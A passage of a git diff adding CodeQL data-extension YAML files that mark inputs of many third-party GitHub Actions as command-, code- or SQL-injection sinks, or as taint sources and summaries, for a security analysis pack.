ql/lib/ext/mr-smithers-excellent_docker-build-push.model.yml create mode 100644 ql/lib/ext/msys2_setup-msys2.model.yml create mode 100644 ql/lib/ext/mxschmitt_action-tmate.model.yml create mode 100644 ql/lib/ext/nanasess_setup-chromedriver.model.yml create mode 100644 ql/lib/ext/nanasess_setup-php.model.yml create mode 100644 ql/lib/ext/nick-fields_retry.model.yml create mode 100644 ql/lib/ext/octokit_graphql-action.model.yml create mode 100644 ql/lib/ext/octokit_request-action.model.yml create mode 100644 ql/lib/ext/olafurpg_setup-scala.model.yml create mode 100644 ql/lib/ext/paambaati_codeclimate-action.model.yml create mode 100644 ql/lib/ext/peter-evans_create-pull-request.model.yml create mode 100644 ql/lib/ext/plasmicapp_plasmic-action.model.yml create mode 100644 ql/lib/ext/preactjs_compressed-size-action.model.yml create mode 100644 ql/lib/ext/py-actions_flake8.model.yml create mode 100644 ql/lib/ext/py-actions_py-dependency-install.model.yml create mode 100644 ql/lib/ext/pyo3_maturin-action.model.yml create mode 100644 ql/lib/ext/reactivecircus_android-emulator-runner.model.yml create mode 100644 ql/lib/ext/reggionick_s3-deploy.model.yml create mode 100644 ql/lib/ext/renovatebot_github-action.model.yml create mode 100644 ql/lib/ext/roots_issue-closer-action.model.yml create mode 100644 ql/lib/ext/ros-tooling_setup-ros.model.yml create mode 100644 ql/lib/ext/skitionek_notify-microsoft-teams.model.yml create mode 100644 ql/lib/ext/snow-actions_eclint.model.yml create mode 100644 ql/lib/ext/stackhawk_hawkscan-action.model.yml create mode 100644 ql/lib/ext/step-security_harden-runner.model.yml create mode 100644 ql/lib/ext/tibdex_backport.model.yml create mode 100644 ql/lib/ext/tripss_conventional-changelog-action.model.yml create mode 100644 ql/lib/ext/tryghost_action-deploy-theme.model.yml create mode 100644 ql/lib/ext/veracode_veracode-sca.model.yml create mode 100644 ql/lib/ext/wearerequired_lint-action.model.yml create mode 100644 ql/lib/ext/webfactory_ssh-agent.model.yml create mode 100644 ql/lib/ext/zaproxy_action-baseline.model.yml create mode 100644 ql/lib/ext/zaproxy_action-full-scan.model.yml diff --git a/ql/lib/ext/8398a7_action-slack.model.yml b/ql/lib/ext/8398a7_action-slack.model.yml new file mode 100644 index 000000000000..e3d97adf69d4 --- /dev/null +++ b/ql/lib/ext/8398a7_action-slack.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["8398a7/action-slack", "*", "input.custom_payload", "code-injection"] \ No newline at end of file diff --git a/ql/lib/ext/actions_github-script.model.yml b/ql/lib/ext/actions_github-script.model.yml index 2ed2e03a34e7..cd409f38b59d 100644 --- a/ql/lib/ext/actions_github-script.model.yml +++ b/ql/lib/ext/actions_github-script.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["actions/github-script","*","input.script","expression-injection"] + - ["actions/github-script", "*", "input.script", "code-injection"] diff --git a/ql/lib/ext/akhileshns_heroku-deploy.model.yml b/ql/lib/ext/akhileshns_heroku-deploy.model.yml index f370a9fe2228..ad65775e58d1 100644 --- a/ql/lib/ext/akhileshns_heroku-deploy.model.yml +++ b/ql/lib/ext/akhileshns_heroku-deploy.model.yml @@ -4,3 +4,18 @@ extensions: extensible: summaryModel data: - ["akhileshns/heroku-deploy", "*", "input.branch", "output.status", "taint"] + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["akhileshns/heroku-deploy", "*", "input.heroku_app_name", "command-injection"] + - ["akhileshns/heroku-deploy", "*", "input.buildpack", "command-injection"] + - ["akhileshns/heroku-deploy", "*", "input.region", "command-injection"] + - ["akhileshns/heroku-deploy", "*", "input.stack", "command-injection"] + - ["akhileshns/heroku-deploy", "*", "input.team", "command-injection"] + - ["akhileshns/heroku-deploy", "*", "input.docker_heroku_process_type", "command-injection"] + - ["akhileshns/heroku-deploy", "*", "input.docker_build_args", "command-injection"] + - ["akhileshns/heroku-deploy", "*", "input.branch", "command-injection"] + - ["akhileshns/heroku-deploy", "*", "input.appdir", "command-injection"] + - ["akhileshns/heroku-deploy", "*", "input.heroku_api_key", "command-injection"] + - ["akhileshns/heroku-deploy", "*", "input.heroku_email", "command-injection"] diff --git a/ql/lib/ext/amannn_action-semantic-pull-request.model.yml b/ql/lib/ext/amannn_action-semantic-pull-request.model.yml new file mode 100644 index 000000000000..c530a3af9b3c --- /dev/null +++ b/ql/lib/ext/amannn_action-semantic-pull-request.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sourceModel + data: + - ["amannn/action-semantic-pull-request", "*", "output.error_message", "pull_request_target", "PR title"] diff --git a/ql/lib/ext/anchore_sbom-action.model.yml b/ql/lib/ext/anchore_sbom-action.model.yml new file mode 100644 index 000000000000..c632a3a1ff25 --- /dev/null +++ b/ql/lib/ext/anchore_sbom-action.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["anchore/sbom-action", "*", "input.syft-version", "command-injection"] + - ["anchore/sbom-action", "*", "input.format", "command-injection"] + - ["anchore/sbom-action", "*", "input.path", "command-injection"] + - ["anchore/sbom-action", "*", "input.file", "command-injection"] + - ["anchore/sbom-action", "*", "input.image", "command-injection"] diff --git a/ql/lib/ext/anchore_scan-action.model.yml b/ql/lib/ext/anchore_scan-action.model.yml new file mode 100644 index 000000000000..26e5adea505b --- /dev/null +++ b/ql/lib/ext/anchore_scan-action.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["anchore/scan-action", "*", "input.grype-version", "command-injection"] diff --git a/ql/lib/ext/andresz1_size-limit-action.model.yml b/ql/lib/ext/andresz1_size-limit-action.model.yml new file mode 100644 index 000000000000..2903888a7318 --- /dev/null +++ b/ql/lib/ext/andresz1_size-limit-action.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["andresz1/size-limit-action", "*", "input.package_manager", "command-injection"] + - ["andresz1/size-limit-action", "*", "input.build_script", "command-injection"] + - ["andresz1/size-limit-action", "*", "input.script", "command-injection"] + - ["andresz1/size-limit-action", "*", "input.clean_script", "command-injection"] diff --git a/ql/lib/ext/asdf-vm_actions.model.yml b/ql/lib/ext/asdf-vm_actions.model.yml new file mode 100644 index 000000000000..21dcd22c8b7f --- /dev/null +++ b/ql/lib/ext/asdf-vm_actions.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["asdf-vm/actions", "*", "input.before_install", "command-injection"] \ No newline at end of file diff --git a/ql/lib/ext/axel-op_googlejavaformat-action.model.yml b/ql/lib/ext/axel-op_googlejavaformat-action.model.yml new file mode 100644 index 000000000000..236eade34a64 --- /dev/null +++ b/ql/lib/ext/axel-op_googlejavaformat-action.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["axel-op/googlejavaformat-action", "*", "input.commitMessage", "command-injection"] + - ["axel-op/googlejavaformat-action", "*", "input.commit-message", "command-injection"] diff --git a/ql/lib/ext/azure_powershell.model.yml b/ql/lib/ext/azure_powershell.model.yml new file mode 100644 index 000000000000..c0e11c8201f4 --- /dev/null +++ b/ql/lib/ext/azure_powershell.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["azure/powershell", "*", "input.azPSVersion", "command-injection"] diff --git a/ql/lib/ext/bahmutov_npm-install.model.yml b/ql/lib/ext/bahmutov_npm-install.model.yml new file mode 100644 index 000000000000..2841f406bdaa --- /dev/null +++ b/ql/lib/ext/bahmutov_npm-install.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["bahmutov/npm-install", "*", "input.install-command", "command-injection"] diff --git a/ql/lib/ext/blackducksoftware_github-action.model.yml b/ql/lib/ext/blackducksoftware_github-action.model.yml new file mode 100644 index 000000000000..aa060de610d9 --- /dev/null +++ b/ql/lib/ext/blackducksoftware_github-action.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["blackducksoftware/github-action", "*", "input.args", "command-injection"] + - ["blackducksoftware/github-action", "*", "input.blackduck.url", "command-injection"] + - ["blackducksoftware/github-action", "*", "input.blackduck.api.token", "command-injection"] diff --git a/ql/lib/ext/bufbuild_buf-breaking-action.model.yml b/ql/lib/ext/bufbuild_buf-breaking-action.model.yml index ee8e6abef097..7d5f699a0e98 100644 --- a/ql/lib/ext/bufbuild_buf-breaking-action.model.yml +++ b/ql/lib/ext/bufbuild_buf-breaking-action.model.yml @@ -4,3 +4,9 @@ extensions: extensible: summaryModel data: - ["bufbuild/buf-breaking-action", "*", "input.buf_token", "env.BUF_TOKEN", "taint"] + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["bufbuild/buf-breaking-action", "*", "input.input", "command-injection"] + - ["bufbuild/buf-breaking-action", "*", "input.against", "command-injection"] diff --git a/ql/lib/ext/bufbuild_buf-lint-action.model.yml b/ql/lib/ext/bufbuild_buf-lint-action.model.yml index c58b5a1e1d2e..aeda79986314 100644 --- a/ql/lib/ext/bufbuild_buf-lint-action.model.yml +++ b/ql/lib/ext/bufbuild_buf-lint-action.model.yml @@ -4,3 +4,8 @@ extensions: extensible: summaryModel data: - ["bufbuild/buf-lint-action", "*", "input.buf_token", "env.BUF_TOKEN", "taint"] + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["bufbuild/buf-lint-action", "*", "input.input", "command-injection"] diff --git a/ql/lib/ext/bufbuild_buf-setup-action.model.yml b/ql/lib/ext/bufbuild_buf-setup-action.model.yml new file mode 100644 index 000000000000..38b18cf6cac8 --- /dev/null +++ b/ql/lib/ext/bufbuild_buf-setup-action.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["bufbuild/buf-setup-action", "*", "input.buf_domain", "command-injection"] + - ["bufbuild/buf-setup-action", "*", "input.buf_user", "command-injection"] diff --git a/ql/lib/ext/cachix_cachix-action.model.yml b/ql/lib/ext/cachix_cachix-action.model.yml index 1c6584eb9d5d..2e4291eb480c 100644 --- a/ql/lib/ext/cachix_cachix-action.model.yml +++ b/ql/lib/ext/cachix_cachix-action.model.yml @@ -4,3 +4,9 @@ extensions: extensible: summaryModel data: - ["cachix/cachix-action", "*", "input.signingKey", "env.CACHIX_SIGNING_KEY", "taint"] + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["cachix/cachix-action", "*", "input.installCommand", "command-injection"] + - ["cachix/cachix-action", "*", "input.cachixBin", "command-injection"] \ No newline at end of file diff --git a/ql/lib/ext/changesets_action.model.yml b/ql/lib/ext/changesets_action.model.yml new file mode 100644 index 000000000000..3be7669275c6 --- /dev/null +++ b/ql/lib/ext/changesets_action.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["changesets/action", "*", "input.publish", "command-injection"] + - ["changesets/action", "*", "input.version", "command-injection"] diff --git a/ql/lib/ext/cloudflare_wrangler-action.model.yml b/ql/lib/ext/cloudflare_wrangler-action.model.yml new file mode 100644 index 000000000000..cb0870b4883f --- /dev/null +++ b/ql/lib/ext/cloudflare_wrangler-action.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["cloudflare/wrangler-action", "*", "input.preCommands", "command-injection"] + - ["cloudflare/wrangler-action", "*", "input.postCommands", "command-injection"] diff --git a/ql/lib/ext/crazy-max_ghaction-chocolatey.model.yml b/ql/lib/ext/crazy-max_ghaction-chocolatey.model.yml new file mode 100644 index 000000000000..30e59e91d60c --- /dev/null +++ b/ql/lib/ext/crazy-max_ghaction-chocolatey.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["crazy-max/ghaction-chocolatey", "*", "input.args", "command-injection"] diff --git a/ql/lib/ext/crazy-max_ghaction-import-gpg.model.yml b/ql/lib/ext/crazy-max_ghaction-import-gpg.model.yml index d4e35196c6c1..f3b021d226b9 100644 --- a/ql/lib/ext/crazy-max_ghaction-import-gpg.model.yml +++ b/ql/lib/ext/crazy-max_ghaction-import-gpg.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: summaryModel data: - - ["crazy-max/ghaction-import-gpg", "*", "input.fingerprint", "output.fingerprint", "taint"] + - ["crazy-max/ghaction-import-gpg", "*", "input.fingerprint", "output.fingerprint", "taint"] \ No newline at end of file diff --git a/ql/lib/ext/cycjimmy_semantic-release-action.model.yml b/ql/lib/ext/cycjimmy_semantic-release-action.model.yml new file mode 100644 index 000000000000..25df02dacaa6 --- /dev/null +++ b/ql/lib/ext/cycjimmy_semantic-release-action.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["cycjimmy/semantic-release-action", "*", "input.semantic_version", "command-injection"] + - ["cycjimmy/semantic-release-action", "*", "input.extra_plugins", "command-injection"] + - ["cycjimmy/semantic-release-action", "*", "input.extends", "command-injection"] diff --git a/ql/lib/ext/cypress-io_github-action.model.yml b/ql/lib/ext/cypress-io_github-action.model.yml new file mode 100644 index 000000000000..2fda092f20a5 --- /dev/null +++ b/ql/lib/ext/cypress-io_github-action.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sourceModel + data: + - ["cypress-io/github-action", "*", "env.GH_BRANCH", "pull_request_target", "PR branch"] diff --git a/ql/lib/ext/dailydotdev_action-devcard.model.yml b/ql/lib/ext/dailydotdev_action-devcard.model.yml new file mode 100644 index 000000000000..324171f3c4b0 --- /dev/null +++ b/ql/lib/ext/dailydotdev_action-devcard.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["dailydotdev/action-devcard", "*", "input.commit_branch", "sql-injection"] + - ["dailydotdev/action-devcard", "*", "input.commit_filename", "sql-injection"] diff --git a/ql/lib/ext/danielpalme_reportgenerator-github-action.model.yml b/ql/lib/ext/danielpalme_reportgenerator-github-action.model.yml new file mode 100644 index 000000000000..cc5c311eea73 --- /dev/null +++ b/ql/lib/ext/danielpalme_reportgenerator-github-action.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["danielpalme/reportgenerator-github-action", "*", "input.toolpath", "command-injection"] diff --git a/ql/lib/ext/daspn_private-actions-checkout.model.yml b/ql/lib/ext/daspn_private-actions-checkout.model.yml new file mode 100644 index 000000000000..f45aae02158d --- /dev/null +++ b/ql/lib/ext/daspn_private-actions-checkout.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["daspn/private-actions-checkout", "*", "input.actions_list", "command-injection"] + - ["daspn/private-actions-checkout", "*", "input.checkout_base_path", "command-injection"] diff --git a/ql/lib/ext/dawidd6_action-ansible-playbook.model.yml b/ql/lib/ext/dawidd6_action-ansible-playbook.model.yml new file mode 100644 index 000000000000..7445d673fcf7 --- /dev/null +++ b/ql/lib/ext/dawidd6_action-ansible-playbook.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["dawidd6/action-ansible-playbook", "*", "input.playbook", "command-injection"] + - ["dawidd6/action-ansible-playbook", "*", "input.options", "command-injection"] diff --git a/ql/lib/ext/dawidd6_action-download-artifact.model.yml b/ql/lib/ext/dawidd6_action-download-artifact.model.yml new file mode 100644 index 000000000000..a8a54dbda292 --- /dev/null +++ b/ql/lib/ext/dawidd6_action-download-artifact.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sourceModel + data: + - ["dawidd6/action-download-artifact", "*", "output.artifacts", "*", "Artifact details"] diff --git a/ql/lib/ext/delaguardo_setup-clojure.model.yml b/ql/lib/ext/delaguardo_setup-clojure.model.yml index 2aa6013c872a..82f491390d2e 100644 --- a/ql/lib/ext/delaguardo_setup-clojure.model.yml +++ b/ql/lib/ext/delaguardo_setup-clojure.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: summaryModel data: - - ["delaguardo/setup-clojure", "*", "input.boot", "env.BOOT_VERSION", "taint"] + - ["delaguardo/setup-clojure", "*", "input.boot", "env.BOOT_VERSION", "taint"] \ No newline at end of file diff --git a/ql/lib/ext/determinatesystems_magic-nix-cache-action.model.yml b/ql/lib/ext/determinatesystems_magic-nix-cache-action.model.yml new file mode 100644 index 000000000000..430a96f6cbef --- /dev/null +++ b/ql/lib/ext/determinatesystems_magic-nix-cache-action.model.yml @@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["determinatesystems/magic-nix-cache-action", "*", "input.source-url", "command-injection"] + - ["determinatesystems/magic-nix-cache-action", "*", "input.source-tag", "command-injection"] + - ["determinatesystems/magic-nix-cache-action", "*", "input.source-pr", "command-injection"] + - ["determinatesystems/magic-nix-cache-action", "*", "input.source-branch", "command-injection"] + - ["determinatesystems/magic-nix-cache-action", "*", "input.source-revision", "command-injection"] + - ["determinatesystems/magic-nix-cache-action", "*", "input.source-binary", "command-injection"] \ No newline at end of file diff --git a/ql/lib/ext/docker-practice_actions-setup-docker.model.yml b/ql/lib/ext/docker-practice_actions-setup-docker.model.yml new file mode 100644 index 000000000000..37bcf2cc7815 --- /dev/null +++ b/ql/lib/ext/docker-practice_actions-setup-docker.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["docker-practice/actions-setup-docker", "*", "input.docker_version", "command-injection"] + - ["docker-practice/actions-setup-docker", "*", "input.docker_channel", "command-injection"] + - ["docker-practice/actions-setup-docker", "*", "input.docker_daemon_json", "command-injection"] diff --git a/ql/lib/ext/docker_build-push-action.model.yml b/ql/lib/ext/docker_build-push-action.model.yml new file mode 100644 index 000000000000..77eaf3ae10f8 --- /dev/null +++ b/ql/lib/ext/docker_build-push-action.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["docker/build-push-action", "*", "input.context", "code-injection"] \ No newline at end of file diff --git a/ql/lib/ext/endbug_latest-tag.model.yml b/ql/lib/ext/endbug_latest-tag.model.yml new file mode 100644 index 000000000000..63cdb2a496b0 --- /dev/null +++ b/ql/lib/ext/endbug_latest-tag.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["endbug/latest-tag", "*", "input.ref", "command-injection"] + - ["endbug/latest-tag", "*", "input.tag-name", "command-injection"] + - ["endbug/latest-tag", "*", "input.git-directory", "command-injection"] + - ["endbug/latest-tag", "*", "input.description", "command-injection"] diff --git a/ql/lib/ext/expo_expo-github-action.model.yml b/ql/lib/ext/expo_expo-github-action.model.yml new file mode 100644 index 000000000000..d0bcbb4da989 --- /dev/null +++ b/ql/lib/ext/expo_expo-github-action.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["expo/expo-github-action", "*", "input.command", "command-injection"] + - ["expo/expo-github-action", "*", "input.packager", "command-injection"] diff --git a/ql/lib/ext/firebaseextended_action-hosting-deploy.model.yml b/ql/lib/ext/firebaseextended_action-hosting-deploy.model.yml new file mode 100644 index 000000000000..6418e71f22a4 --- /dev/null +++ b/ql/lib/ext/firebaseextended_action-hosting-deploy.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["firebaseextended/action-hosting-deploy", "*", "input.firebaseToolsVersion", "command-injection"] diff --git a/ql/lib/ext/gabrielbb_xvfb-action.model.yml b/ql/lib/ext/gabrielbb_xvfb-action.model.yml new file mode 100644 index 000000000000..86705319e23d --- /dev/null +++ b/ql/lib/ext/gabrielbb_xvfb-action.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["gabrielbb/xvfb-action", "*", "input.run", "command-injection"] + - ["gabrielbb/xvfb-action", "*", "input.options", "command-injection"] \ No newline at end of file diff --git a/ql/lib/ext/game-ci_unity-builder.model.yml b/ql/lib/ext/game-ci_unity-builder.model.yml new file mode 100644 index 000000000000..61fdcd9254a4 --- /dev/null +++ b/ql/lib/ext/game-ci_unity-builder.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["game-ci/unity-builder", "*", "input.cacheKey", "command-injection"] + - ["game-ci/unity-builder", "*", "input.unityHubVersionOnMac", "command-injection"] diff --git a/ql/lib/ext/game-ci_unity-test-runner.model.yml b/ql/lib/ext/game-ci_unity-test-runner.model.yml index ab413b6e9759..2d142d98099b 100644 --- a/ql/lib/ext/game-ci_unity-test-runner.model.yml +++ b/ql/lib/ext/game-ci_unity-test-runner.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: summaryModel data: - - ["game-ci/unity-test-runner", "*", "input.artifactsPath", "output.artifactsPath", "taint"] + - ["game-ci/unity-test-runner", "*", "input.artifactsPath", "output.artifactsPath", "taint"] \ No newline at end of file diff --git a/ql/lib/ext/gautamkrishnar_blog-post-workflow.model.yml b/ql/lib/ext/gautamkrishnar_blog-post-workflow.model.yml new file mode 100644 index 000000000000..1727ca60e258 --- /dev/null +++ b/ql/lib/ext/gautamkrishnar_blog-post-workflow.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["gautamkrishnar/blog-post-workflow", "*", "input.item_exec", "code-injection"] \ No newline at end of file diff --git a/ql/lib/ext/go-semantic-release_action.model.yml b/ql/lib/ext/go-semantic-release_action.model.yml new file mode 100644 index 000000000000..146f4a17a559 --- /dev/null +++ b/ql/lib/ext/go-semantic-release_action.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["go-semantic-release/action", "*", "input.bin", "command-injection"] diff --git a/ql/lib/ext/golangci_golangci-lint-action.model.yml b/ql/lib/ext/golangci_golangci-lint-action.model.yml new file mode 100644 index 000000000000..8c0f7a5ad614 --- /dev/null +++ b/ql/lib/ext/golangci_golangci-lint-action.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["golangci/golangci-lint-action", "*", "input.version", "command-injection"] diff --git a/ql/lib/ext/gonuit_heroku-docker-deploy.model.yml b/ql/lib/ext/gonuit_heroku-docker-deploy.model.yml new file mode 100644 index 000000000000..9c7c03b9f357 --- /dev/null +++ b/ql/lib/ext/gonuit_heroku-docker-deploy.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["gonuit/heroku-docker-deploy", "*", "input.email", "command-injection"] + - ["gonuit/heroku-docker-deploy", "*", "input.heroku_api_key", "command-injection"] diff --git a/ql/lib/ext/goreleaser_goreleaser-action.model.yml b/ql/lib/ext/goreleaser_goreleaser-action.model.yml new file mode 100644 index 000000000000..9d9eac38af01 --- /dev/null +++ b/ql/lib/ext/goreleaser_goreleaser-action.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["goreleaser/goreleaser-action", "*", "input.args", "command-injection"] diff --git a/ql/lib/ext/gr2m_create-or-update-pull-request-action.model.yml b/ql/lib/ext/gr2m_create-or-update-pull-request-action.model.yml new file mode 100644 index 000000000000..4c74301d1c35 --- /dev/null +++ b/ql/lib/ext/gr2m_create-or-update-pull-request-action.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["gr2m/create-or-update-pull-request-action", "*", "input.branch", "command-injection"] + - ["gr2m/create-or-update-pull-request-action", "*", "input.path", "command-injection"] + - ["gr2m/create-or-update-pull-request-action", "*", "input.commit-message", "command-injection"] + - ["gr2m/create-or-update-pull-request-action", "*", "input.author", "command-injection"] \ No newline at end of file diff --git a/ql/lib/ext/ilammy_msvc-dev-cmd.model.yml b/ql/lib/ext/ilammy_msvc-dev-cmd.model.yml new file mode 100644 index 000000000000..6332cbfdad8e --- /dev/null +++ b/ql/lib/ext/ilammy_msvc-dev-cmd.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["ilammy/msvc-dev-cmd", "*", "input.vsversion", "command-injection"] + - ["ilammy/msvc-dev-cmd", "*", "input.arch", "command-injection"] + - ["ilammy/msvc-dev-cmd", "*", "input.sdk", "command-injection"] + - ["ilammy/msvc-dev-cmd", "*", "input.toolset", "command-injection"] \ No newline at end of file diff --git a/ql/lib/ext/ilammy_setup-nasm.model.yml b/ql/lib/ext/ilammy_setup-nasm.model.yml new file mode 100644 index 000000000000..f8b8490c2135 --- /dev/null +++ b/ql/lib/ext/ilammy_setup-nasm.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["ilammy/setup-nasm", "*", "input.version", "command-injection"] + - ["ilammy/setup-nasm", "*", "input.destination", "command-injection"] diff --git a/ql/lib/ext/imjohnbo_issue-bot.model.yml b/ql/lib/ext/imjohnbo_issue-bot.model.yml new file mode 100644 index 000000000000..64024ef5c72d --- /dev/null +++ b/ql/lib/ext/imjohnbo_issue-bot.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["imjohnbo/issue-bot", "*", "input.body", "code-injection"] + - ["imjohnbo/issue-bot", "*", "input.linked-comments-previous-issue-text", "code-injection"] + - ["imjohnbo/issue-bot", "*", "input.linked-comments-new-issue-text", "code-injection"] \ No newline at end of file diff --git a/ql/lib/ext/iterative_setup-cml.model.yml b/ql/lib/ext/iterative_setup-cml.model.yml new file mode 100644 index 000000000000..1771ac2bad05 --- /dev/null +++ b/ql/lib/ext/iterative_setup-cml.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["iterative/setup-cml", "*", "input.version", "command-injection"] diff --git a/ql/lib/ext/iterative_setup-dvc.model.yml b/ql/lib/ext/iterative_setup-dvc.model.yml new file mode 100644 index 000000000000..e8600c6f7df5 --- /dev/null +++ b/ql/lib/ext/iterative_setup-dvc.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["iterative/setup-dvc", "*", "input.version", "command-injection"] diff --git a/ql/lib/ext/jamesives_github-pages-deploy-action.model.yml b/ql/lib/ext/jamesives_github-pages-deploy-action.model.yml new file mode 100644 index 000000000000..2ab70905db16 --- /dev/null +++ b/ql/lib/ext/jamesives_github-pages-deploy-action.model.yml @@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["jamesives/github-pages-deploy-action", "*", "input.branch", "command-injection"] + - ["jamesives/github-pages-deploy-action", "*", "input.commit-message", "command-injection"] + - ["jamesives/github-pages-deploy-action", "*", "input.git-config-email", "command-injection"] + - ["jamesives/github-pages-deploy-action", "*", "input.git-config-name", "command-injection"] + - ["jamesives/github-pages-deploy-action", "*", "input.target-folder", "command-injection"] + - ["jamesives/github-pages-deploy-action", "*", "input.tag", "command-injection"] diff --git a/ql/lib/ext/johnnymorganz_stylua-action.model.yml b/ql/lib/ext/johnnymorganz_stylua-action.model.yml new file mode 100644 index 000000000000..948be24b45cd --- /dev/null +++ b/ql/lib/ext/johnnymorganz_stylua-action.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["johnnymorganz/stylua-action", "*", "input.args", "command-injection"] diff --git a/ql/lib/ext/jurplel_install-qt-action.model.yml b/ql/lib/ext/jurplel_install-qt-action.model.yml new file mode 100644 index 000000000000..928c1f918d3f --- /dev/null +++ b/ql/lib/ext/jurplel_install-qt-action.model.yml @@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["jurplel/install-qt-action", "*", "input.version", "command-injection"] + - ["jurplel/install-qt-action", "*", "input.arch", "command-injection"] + - ["jurplel/install-qt-action", "*", "input.dir", "command-injection"] + - ["jurplel/install-qt-action", "*", "input.aqtversion", "command-injection"] + - ["jurplel/install-qt-action", "*", "input.py7zrversion", "command-injection"] + - ["jurplel/install-qt-action", "*", "input.extra", "command-injection"] diff --git a/ql/lib/ext/jwalton_gh-ecr-push.model.yml b/ql/lib/ext/jwalton_gh-ecr-push.model.yml index b237ac313d2a..ad95f1f323a7 100644 --- a/ql/lib/ext/jwalton_gh-ecr-push.model.yml +++ 